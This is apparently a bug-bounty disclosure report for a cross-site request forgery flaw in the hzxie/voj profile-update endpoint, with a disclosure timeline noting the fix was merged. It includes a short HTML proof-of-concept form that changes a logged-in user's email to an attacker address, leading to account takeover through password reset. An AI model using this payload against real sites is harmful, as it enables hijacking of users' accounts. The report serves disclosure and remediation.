Cross-Site Request Forgery (CSRF) in hzxie/voj


Reported on

Sep 9th 2021

✍️ Description

The Update Profile has not any CSRF protection that make attackers able to change the users email and then can lead to account take over with Reset password functionality.

🕵️‍♂️ Proof of Concept

1.login as a user

2.Open PoC.html file.

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="socialLinks" value="&#123;&#125;" />
      <input type="hidden" name="aboutMe" value="" />
      <input type="submit" value="Submit request" />

You can see that the email will be changed to

💥 Impact

This vulnerability is capable of take control of users accounts.

We have contacted a member of the hzxie/voj team and are waiting to hear back a year ago
We have sent a second follow up to the hzxie/voj team. We will try again in 10 days. a year ago
hzxie validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
hzxie confirmed that a fix has been merged on 74c17a a year ago
The fix bounty has been dropped
to join this conversation